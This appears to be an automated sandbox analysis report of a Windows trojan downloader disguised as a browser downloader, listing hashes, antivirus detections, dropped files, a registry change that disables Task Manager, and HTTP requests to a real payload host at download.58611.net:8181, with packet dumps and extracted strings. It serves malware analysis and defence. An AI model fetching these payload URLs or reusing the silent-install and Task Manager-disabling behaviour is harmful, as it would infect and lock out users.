Analysis Date2015-03-11 08:05:50
MD553f104a862c26b8b3f8eb277c39d54f8
SHA145268a82c3c6a11575900e8c1512f326fe289558

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e1fcb3384e3d4a7fee8707575169b423 sha1: 7cdd4a976ce92c25ea19032e5e6acc5c9258efe7 size: 425984
Section.rdata md5: 920d9217567c32989e36f39e95441f66 sha1: bb1e9530c517a4c9c1c64840f4fa885fbfde9480 size: 69632
Section.data md5: 781a7d593d1ff6e435e399449f219fb5 sha1: b4e330b5392f4a34e3f2eef3e7b9c65960b86535 size: 61440
Section.rsrc md5: 2ac8a57cf2ba0048fc937073697383bc sha1: be924771e27b17330d9fbbb2dff2a6e265cdc81d size: 90112
Timestamp2014-12-31 19:28:58
VersionLegalCopyright: AV浏览器在线下载器 版权所有
FileVersion: 1.0.0.0
CompanyName: AV浏览器在线下载器
Comments: AV浏览器在线下载器
ProductName: AV浏览器在线下载器
ProductVersion: 1.0.0.0
FileDescription: AV浏览器在线下载器
PackerMicrosoft Visual C++ v6.0
PEhashf5c4068ac6320da24c8857aa20e9a8e6e0d5e031
IMPhash0ea62fd10058f1257469f695d7d03cf5
AV360 Safeno_virus
AVAd-AwareTrojan.GenericKD.2153258
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Trojan.GenericKD.2153258
AVAuthentiumW32/Agent.EW.gen!Eldorado
AVAvira (antivir)TR/Agent.651264.291
AVBullGuardTrojan.GenericKD.2153258
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftTrojan.GenericKD.2153258
AVEset (nod32)no_virus
AVFortinetW32/Diztakun.FZV!tr
AVFrisk (f-prot)W32/Agent.EW.gen!Eldorado
AVF-SecureTrojan:W32/DelfInject.R
AVGrisoft (avg)Win32/DH{IEEuQ4ETIiVXTg}
AVIkarusTrojan.SuspectCRC
AVK7Trojan ( 004b4ad01 )
AVKaspersky 2015Trojan.Win32.Diztakun.fzv
AVMalwareBytesno_virus
AVMcafeeRDN/Generic Downloader.x!mt
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Trojan.GenericKD.2153258
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)Trojan-Downloader.EIC.7121

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr ➝
1
Creates FileC:\Program Files\UCBrowser_silent_44750464.exe
Creates FileC:\Program Files\pic_silent_44750464.exe
Creates FileC:\Program Files\pps_silent_44750464.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Program Files\QQBrowser_silent_44750464.exe
Creates FileC:\Program Files\sogouie_silent_44750464.exe
Creates FileC:\Program Files\baidusd_silent_44750464.exe
Creates FileC:\Program Files\kuwo_silent_44750464.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Program Files\ADMon.29055-8373.exe
Creates FileC:\Program Files\PPTV_forqd3036_08373.exe
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Program Files\haozip_silent_44750464.exe
Creates FileC:\Program Files\baiduan_silent_44750464.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNSdownload.58611.net
Type: A
218.241.29.215
HTTP GEThttp://download.58611.net:8181/QQBrowser/QQBrowser_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.58611.net:8181/pps/pps_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.58611.net:8181/uc/UCBrowser_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.58611.net:8181/haozip_silent/haozip_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.58611.net:8181/baiduan/baiduan_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.58611.net:8181/baidusd/baidusd_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.58611.net:8181/sogouie/sogouie_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.58611.net:8181/pic/pic_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.58611.net:8181/kuwo_silent/kuwo_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.58611.net:8181/admon/ADMon.29055-8437.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.58611.net:8181/pptv_silent/PPTV_forqd3036_08437.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1032 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1033 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1034 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1035 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1036 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1037 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1038 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1039 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1040 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1041 ➝ 218.241.29.215:8181

Raw Pcap
0x00000000 (00000)   47455420 2f515142 726f7773 65722f51   GET /QQBrowser/Q
0x00000010 (00016)   5142726f 77736572 5f73696c 656e745f   QBrowser_silent_
0x00000020 (00032)   34343735 30343634 2e657865 20485454   44750464.exe HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000050 (00080)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000060 (00096)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000070 (00112)   20352e30 290d0a41 63636570 743a202a    5.0)..Accept: *
0x00000080 (00128)   2f2a0d0a 486f7374 3a20646f 776e6c6f   /*..Host: downlo
0x00000090 (00144)   61642e35 38363131 2e6e6574 3a383138   ad.58611.net:818
0x000000a0 (00160)   310d0a43 61636865 2d436f6e 74726f6c   1..Cache-Control
0x000000b0 (00176)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f707073 2f707073 5f73696c   GET /pps/pps_sil
0x00000010 (00016)   656e745f 34343735 30343634 2e657865   ent_44750464.exe
0x00000020 (00032)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000030 (00048)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000040 (00064)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000050 (00080)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000060 (00096)   73204e54 20352e30 290d0a41 63636570   s NT 5.0)..Accep
0x00000070 (00112)   743a202a 2f2a0d0a 486f7374 3a20646f   t: */*..Host: do
0x00000080 (00128)   776e6c6f 61642e35 38363131 2e6e6574   wnload.58611.net
0x00000090 (00144)   3a383138 310d0a43 61636865 2d436f6e   :8181..Cache-Con
0x000000a0 (00160)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000b0 (00176)   0d0a6e6f 2d636163 68650d0a 0d0a       ..no-cache....

0x00000000 (00000)   47455420 2f75632f 55434272 6f777365   GET /uc/UCBrowse
0x00000010 (00016)   725f7369 6c656e74 5f343437 35303436   r_silent_4475046
0x00000020 (00032)   342e6578 65204854 54502f31 2e310d0a   4.exe HTTP/1.1..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000050 (00080)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000060 (00096)   696e646f 7773204e 5420352e 30290d0a   indows NT 5.0)..
0x00000070 (00112)   41636365 70743a20 2a2f2a0d 0a486f73   Accept: */*..Hos
0x00000080 (00128)   743a2064 6f776e6c 6f61642e 35383631   t: download.5861
0x00000090 (00144)   312e6e65 743a3831 38310d0a 43616368   1.net:8181..Cach
0x000000a0 (00160)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000b0 (00176)   6368650d 0a0d0a63 68650d0a 0d0a       che....che....

0x00000000 (00000)   47455420 2f68616f 7a69705f 73696c65   GET /haozip_sile
0x00000010 (00016)   6e742f68 616f7a69 705f7369 6c656e74   nt/haozip_silent
0x00000020 (00032)   5f343437 35303436 342e6578 65204854   _44750464.exe HT
0x00000030 (00048)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000040 (00064)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000050 (00080)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000060 (00096)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000070 (00112)   5420352e 30290d0a 41636365 70743a20   T 5.0)..Accept: 
0x00000080 (00128)   2a2f2a0d 0a486f73 743a2064 6f776e6c   */*..Host: downl
0x00000090 (00144)   6f61642e 35383631 312e6e65 743a3831   oad.58611.net:81
0x000000a0 (00160)   38310d0a 43616368 652d436f 6e74726f   81..Cache-Contro
0x000000b0 (00176)   6c3a206e 6f2d6361 6368650d 0a0d0a     l: no-cache....

0x00000000 (00000)   47455420 2f626169 6475616e 2f626169   GET /baiduan/bai
0x00000010 (00016)   6475616e 5f73696c 656e745f 34343735   duan_silent_4475
0x00000020 (00032)   30343634 2e657865 20485454 502f312e   0464.exe HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e30   ; Windows NT 5.0
0x00000070 (00112)   290d0a41 63636570 743a202a 2f2a0d0a   )..Accept: */*..
0x00000080 (00128)   486f7374 3a20646f 776e6c6f 61642e35   Host: download.5
0x00000090 (00144)   38363131 2e6e6574 3a383138 310d0a43   8611.net:8181..C
0x000000a0 (00160)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000b0 (00176)   2d636163 68650d0a 0d0a650d 0a0d0a     -cache....e....

0x00000000 (00000)   47455420 2f626169 64757364 2f626169   GET /baidusd/bai
0x00000010 (00016)   64757364 5f73696c 656e745f 34343735   dusd_silent_4475
0x00000020 (00032)   30343634 2e657865 20485454 502f312e   0464.exe HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e30   ; Windows NT 5.0
0x00000070 (00112)   290d0a41 63636570 743a202a 2f2a0d0a   )..Accept: */*..
0x00000080 (00128)   486f7374 3a20646f 776e6c6f 61642e35   Host: download.5
0x00000090 (00144)   38363131 2e6e6574 3a383138 310d0a43   8611.net:8181..C
0x000000a0 (00160)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000b0 (00176)   2d636163 68650d0a 0d0a650d 0a0d0a     -cache....e....

0x00000000 (00000)   47455420 2f736f67 6f756965 2f736f67   GET /sogouie/sog
0x00000010 (00016)   6f756965 5f73696c 656e745f 34343735   ouie_silent_4475
0x00000020 (00032)   30343634 2e657865 20485454 502f312e   0464.exe HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e30   ; Windows NT 5.0
0x00000070 (00112)   290d0a41 63636570 743a202a 2f2a0d0a   )..Accept: */*..
0x00000080 (00128)   486f7374 3a20646f 776e6c6f 61642e35   Host: download.5
0x00000090 (00144)   38363131 2e6e6574 3a383138 310d0a43   8611.net:8181..C
0x000000a0 (00160)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000b0 (00176)   2d636163 68650d0a 0d0a650d 0a0d0a     -cache....e....

0x00000000 (00000)   47455420 2f706963 2f706963 5f73696c   GET /pic/pic_sil
0x00000010 (00016)   656e745f 34343735 30343634 2e657865   ent_44750464.exe
0x00000020 (00032)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000030 (00048)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000040 (00064)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000050 (00080)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000060 (00096)   73204e54 20352e30 290d0a41 63636570   s NT 5.0)..Accep
0x00000070 (00112)   743a202a 2f2a0d0a 486f7374 3a20646f   t: */*..Host: do
0x00000080 (00128)   776e6c6f 61642e35 38363131 2e6e6574   wnload.58611.net
0x00000090 (00144)   3a383138 310d0a43 61636865 2d436f6e   :8181..Cache-Con
0x000000a0 (00160)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000b0 (00176)   0d0a6163 68650d0a 0d0a650d 0a0d0a     ..ache....e....

0x00000000 (00000)   47455420 2f6b7577 6f5f7369 6c656e74   GET /kuwo_silent
0x00000010 (00016)   2f6b7577 6f5f7369 6c656e74 5f343437   /kuwo_silent_447
0x00000020 (00032)   35303436 342e6578 65204854 54502f31   50464.exe HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000050 (00080)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000060 (00096)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000070 (00112)   30290d0a 41636365 70743a20 2a2f2a0d   0)..Accept: */*.
0x00000080 (00128)   0a486f73 743a2064 6f776e6c 6f61642e   .Host: download.
0x00000090 (00144)   35383631 312e6e65 743a3831 38310d0a   58611.net:8181..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a0d 0a0d0a     o-cache........

0x00000000 (00000)   47455420 2f61646d 6f6e2f41 444d6f6e   GET /admon/ADMon
0x00000010 (00016)   2e323930 35352d38 3433372e 65786520   .29055-8437.exe 
0x00000020 (00032)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000050 (00080)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000060 (00096)   204e5420 352e3029 0d0a4163 63657074    NT 5.0)..Accept
0x00000070 (00112)   3a202a2f 2a0d0a48 6f73743a 20646f77   : */*..Host: dow
0x00000080 (00128)   6e6c6f61 642e3538 3631312e 6e65743a   nload.58611.net:
0x00000090 (00144)   38313831 0d0a4361 6368652d 436f6e74   8181..Cache-Cont
0x000000a0 (00160)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x000000b0 (00176)   0a2d6361 6368650d 0a0d0a0d 0a0d0a     .-cache........

0x00000000 (00000)   47455420 2f707074 765f7369 6c656e74   GET /pptv_silent
0x00000010 (00016)   2f505054 565f666f 72716433 3033365f   /PPTV_forqd3036_
0x00000020 (00032)   30383433 372e6578 65204854 54502f31   08437.exe HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000050 (00080)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000060 (00096)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000070 (00112)   30290d0a 41636365 70743a20 2a2f2a0d   0)..Accept: */*.
0x00000080 (00128)   0a486f73 743a2064 6f776e6c 6f61642e   .Host: download.
0x00000090 (00144)   35383631 312e6e65 743a3831 38310d0a   58611.net:8181..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a0d 0a0d0a     o-cache........


Strings
....  ................
"#
....
.........
10/.-,+*)('&%$#"! ..............
.....
..........
..
.........
-
..
x
==
...
.
 
-% BbmHpAadYySMI \
.-E-0-0..
00-+ 
e
 
00...........?-  
0
0 
0
?
Eu
    
 ......
 (*.*)
#####
#######
080404B0
 %1 
1.0.0.0
	1uM
@!A6A]A
(&C)
Comments
CompanyName
	Ctrl+
	Ctrl+D
	Ctrl+End
	Ctrl+G
	Ctrl+Home
	Ctrl+N
	Ctrl+PageDown
	Ctrl+PageUp
	&D.
DEFAULT_ICON
 DLL 
(&E)
E*E:ENE^E~E
FileDescription
FileVersion
Fjjj
Fjjjj
Fjjjjjjjj
         (((((                  H
(&H)
(&I)
 INI 
jjjj
LegalCopyright
msctls_progress32
msctls_updown32
MS Shell Dlg
(&N)
(null)
(&O)
(&P)
	PageDown
	PageUp
ProductName
ProductVersion
Progress1
 %s 
(&S)
	Shift+Tab
Spin1
StringFileInfo
(&T)
	Tab/Enter
TEXTINCLUDE
Translation
VarFileInfo
VS_VERSION_INFO
xxxx
^,_^][
^$_^[]
   (   
 (*.*)|*.*||
;;;>:::
&&&@'''
+++",,,
	!	!	!	!	
(&07-034/)7 '
0B=@TH
0dk:ghV
/0=>;<L
0R>\W[
13=r=AJ
,1"52.*
1#QNAN
1#SNAN
	2	5	5	5	5	5
%+.2d%.2d
44750464
\$4t|Ht@H
|?5^<@
5	!	!	!	!
52F260023059454187AF826A3C07AF2A
	5	5	5
555*666
5F99C1642A2F4e03850721B4F5D7C3F8
	6	6	6	6
	6	6	6	6	6	6	6	6	6	6	,	,	,	,	,	,	,	,	+	+	+	+	+	/	/	/	'	'	'	'	'	'	'	'	'	'	(	(	(	(	(	(	(	(	(	(	(	(	(	
707ca37322474f6ca841f0e224f4b620
	7	7	7	7	7	7	7	7	7	7	7	*	*	-	-	-	-
777N888
888n:::
8MThdu
\$8UVW
9^0u/j
'9A`u"9
9D$$t+
9L$x~e
9l$xtU9
9nPu	9^T
9o4u'V
	9oTtc
9t$0v8
9^xu5j
<A|2<Z
AAAr@@@.???
abcddefghijklmnoopqrrsstuvvwwxyyz;
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abnormal program termination
Accept: */*
Accept: */* 
%a, %d %b %Y %H:%M:%S 
AdjustWindowRectEx
Advapi32.dll
ADVAPI32.dll
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
Afx:%x:%x
Afx:%x:%x:%x:%x:%x
AppendMenuA
.?AUCThreadData@@
August
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CHECKLIST_STATE@@
.?AV_AFX_COLOR_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_SOCK_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVCArchiveException@@
.?AVCBitmap@@
.?AVCBrush@@
.?AVCButton@@
.?AVCClientDC@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCColorDialog@@
.?AVCComboBox@@
.?AVCCommonDialog@@
.?AVCCriticalSection@@
.?AVCDC@@
.?AVCDialog@@
.?AVCDWordArray@@
.?AVCEdit@@
.?AVCException@@
.?AVCFile@@
.?AVCFileDialog@@
.?AVCFileException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCImageList@@
.?AVCMapPtrToPtr@@
.?AVCMapStringToPtr@@
.?AVCMemFile@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCPaintDC@@
.?AVCPen@@
.?AVCProgressCtrl@@
.?AVCPtrArray@@
.?AVCPtrList@@
.?AVCResourceException@@
.?AVCRgn@@
.?AVCSessionMapPtrToPtr@@
.?AVCSharedFile@@
.?AVCSimpleException@@
.?AVCStatic@@
.?AVCStringArray@@
.?AVCSyncObject@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempImageList@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCToolTipCtrl@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWindowDC@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVCWordArray@@
.?AVtype_info@@
<A|@<Z
___b___
---b///
B 02CV
bcdfghijklmnpqrstuvwxyz
BeginPaint
BeginPath
BitBlt
BKbhTb~XBK!;
 (*.BMP)|*.BMP|GIF
Bogus message code %d
BRPj+S
C =02CVu
CallNextHookEx
CallWindowProcA
CArchiveException
CBitmap
CBrush
CButton
ccc(bbb~bbb
CClientDC
CCmdTarget
CColorDialog
CColourPicker
CComboBox
CCriticalSection
Cc: %s
CDialog
CDWordArray
CException
CFileDialog
CFileException
CGdiObject
CharUpperA
CheckMenuItem
ChildWindowFromPointEx
ChooseColorA
CImageList
ck(WSbpS
ClientToScreen
CloseClipboard
CloseDatabase
CloseHandle
ClosePrinter
CLSIDFromString
CMapPtrToPtr
CMapStringToPtr
CMemFile
CMemoryException
CNotSupportedException
CObject
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
commctrl_DragListMsg
commdlg_ColorOK
commdlg_FileNameOK
commdlg_help
commdlg_LBSelChangedNotify
commdlg_SetRGBColor
commdlg_ShareViolation
CompareStringA
CompareStringW
Content-Transfer-Encoding: base64
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Content-type: text/plain; charset="
CopyAcceleratorTableA
CopyRect
CPaintDC
CPalette
C:\Program Files\ADMon.29055-8373.exe
C:\Program Files\baiduan_silent_44750464.exe
C:\Program Files\baidusd_silent_44750464.exe
C:\Program Files\haozip_silent_44750464.exe
C:\Program Files\kuwo_silent_44750464.exe
C:\Program Files\pic_silent_44750464.exe
C:\Program Files\pps_silent_44750464.exe
C:\Program Files\PPTV_forqd3036_08373.exe
C:\Program Files\QQBrowser_silent_44750464.exe
C:\Program Files\sogouie_silent_44750464.exe
C:\Program Files\UCBrowser_silent_44750464.exe
CProgressCtrl
CPtrArray
CPtrList
CreateAcceleratorTableA
CreateBitmap
CreateCompatibleBitmap
CreateCompatibleDC
CreateDCA
CreateDialogIndirectParamA
CreateDIBitmap
CreateEllipticRgn
CreateEventA
CreateFileA
CreateFontIndirectA
CreateIconFromResource
CreateIconFromResourceEx
CreateMenu
CreatePalette
CreatePen
CreatePolygonRgn
CreatePopupMenu
CreateRectRgn
CreateRectRgnIndirect
CreateRoundRectRgn
CreateSemaphoreA
CreateSolidBrush
CreateThread
CreateWindowExA
CResourceException
CSharedFile
CStatic
CStringArray
CSyncObject
CTempDC
CTempGdiObject
CTempImageList
CTempMenu
CTempWnd
CToolTipCtrl
Ctrl+A
Ctrl+B
Ctrl+C
Ctrl+D
Ctrl+E
Ctrl+F
Ctrl+F1
Ctrl+F10
Ctrl+F11
Ctrl+F12
Ctrl+F2
Ctrl+F3
Ctrl+F4
Ctrl+F5
Ctrl+F6
Ctrl+F7
Ctrl+F8
Ctrl+F9
Ctrl+G
Ctrl+H
Ctrl+I
Ctrl+J
Ctrl+K
Ctrl+L
Ctrl+M
Ctrl+N
Ctrl+O
Ctrl+P
Ctrl+Q
Ctrl+R
Ctrl+S
Ctrl+Shift+F1
Ctrl+Shift+F10
Ctrl+Shift+F11
Ctrl+Shift+F12
Ctrl+Shift+F2
Ctrl+Shift+F3
Ctrl+Shift+F4
Ctrl+Shift+F5
Ctrl+Shift+F6
Ctrl+Shift+F7
Ctrl+Shift+F8
Ctrl+Shift+F9
Ctrl+T
Ctrl+U
Ctrl+V
Ctrl+W
Ctrl+X
Ctrl+Y
Ctrl+Z
 (*.CUR)|*.CUR|
CUserException
CWinApp
CWindowDC
CWinFormUnit
CWinThread
CWordArray
?? / %d]
D$ _^][
D$,_^]
D$,;\$|
D$(_^]
D$(_^][
D$$_^[
d09f2340818511d396f6aaf844c7e325
D$0WPQ
D$ |2;
D$49D$$}
D$89Vdu
D$8RPj
D$8VPQ
D$$~9+
@.data
Date: %s
D$(CUSWP
 %d/%d 
(%d-%d):
%d / %d
%d / %d]
DDDd'''
dddd, MMMM dd, yyyy
dddfddd
dddnfff
D$\d?H
D$dPQV
D$dQUWRP
D$dSUVW
D$DSWRPQ
D$DURP
December
DEFAULT_ICON
#define _AFX_NO_OLE_RESOURCES
#define _AFX_NO_PROPERTY_RESOURCES
#define _AFX_NO_TRACKER_RESOURCES
DefWindowProcA
DELETE
DeleteCriticalSection
DeleteDC
DeleteMenu
DeleteObject
DestroyAcceleratorTable
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
device
devices
D$H_^][
D$ hP/C
D$$hpCH
D$hQRP
D$hRPQ
D$hSUV3
D$hUPQ
D$HUPQ
D$HUSj
DispatchMessageA
DISPLAY
D$(;l$ 
DllRegisterServer
DllUnregisterServer
D$LPUj
D$LUSWP
DocumentPropertiesA
DOMAIN error
D$,Pj<j
D$ PQR
D$PQRP
D$PRPQ
DPtoLP
D$(QPW
D$(QRP
D$$QUP
DrawEdge
DrawFocusRect
DrawFrameControl
DrawIconEx
DrawTextA
D$@RPQj
D$ RPUhD
D$,RVh 
D$,SPh
D$(SUV
D$$SUV
D$TRPW
D$TVPW
DuplicateHandle
D$@UPQ
|$D UV
D$@WPS
D$XPQU
D$XQRWP
;D$xt&
ech1Y%
EHPWVS
Ellipse
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndDoc
#endif
#endif //_WIN32
EndPage
EndPaint
EndPath
EnterCriticalSection
EnumDisplayMonitors
EnumDisplaySettingsA
eQpenc
EqualRect
Escape
ExcludeClipRect
ExitProcess
explore
ExtSelectClipRgn
ExtTextOutA
F<_^][
F,_^][
F\_^][
F09^4u*j
F49^8u&j
F89^8u&j
F(9V8tQ
FD@ul9L$(}f
FD uy9D$$}s
February
F%*.*f
F(_+F$^[;E
?fff&ff23
fff ggg
fff$ggg
F$@;F(v
F$@@;F(v
FileTimeToLocalFileTime
FileTimeToSystemTime
FillRect
FillRgn
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
F\jLSP
- floating point not loaded
FlushFileBuffers
FpHt&Ht
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
From: %s
[/fS_MR
Fxt_;FTu@
GAIsProcessorFeaturePresent
g~b1Y%
gb2312
=?gb2312?B?
Gdi32.dll
GDI32.dll
GetACP
GetActiveWindow
GetBkColor
GetBkMode
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipboardData
GetClipBox
GetClipRgn
GetCommandLineA
GetConnectString
GetCPInfo
GetCurrentObject
GetCurrentProcess
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDesktopWindow
GetDeviceCaps
GetDIBits
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileSize
GetFileTime
GetFileTitleA
GetFileType
GetFocus
GetForegroundWindow
GetFullPathNameA
GetKeyState
GetLastActivePopup
GetLastError
GetLocalTime
GetMenu
GetMenuCheckMarkDimensions
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleHandleA
GetMonitorInfoA
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetOpenFileNameA
GetParent
GetPolyFillMode
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProfileStringA
GetPropA
GetROP2
GetSaveFileNameA
GetScrollPos
GetScrollRange
GetStartupInfoA
GetStdHandle
GetStockObject
GetStretchBltMode
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemMenu
GetSystemMetrics
GetSystemPaletteEntries
GetSystemTime
GetTabList
GetTextColor
GetTextExtentPoint32A
GetTextMetricsA
GetTickCount
GetTimeZoneInformation
GetTopWindow
GetVersion
GetVersionExA
GetViewportExtEx
GetViewportOrgEx
GetVolumeInformationA
GetWindow
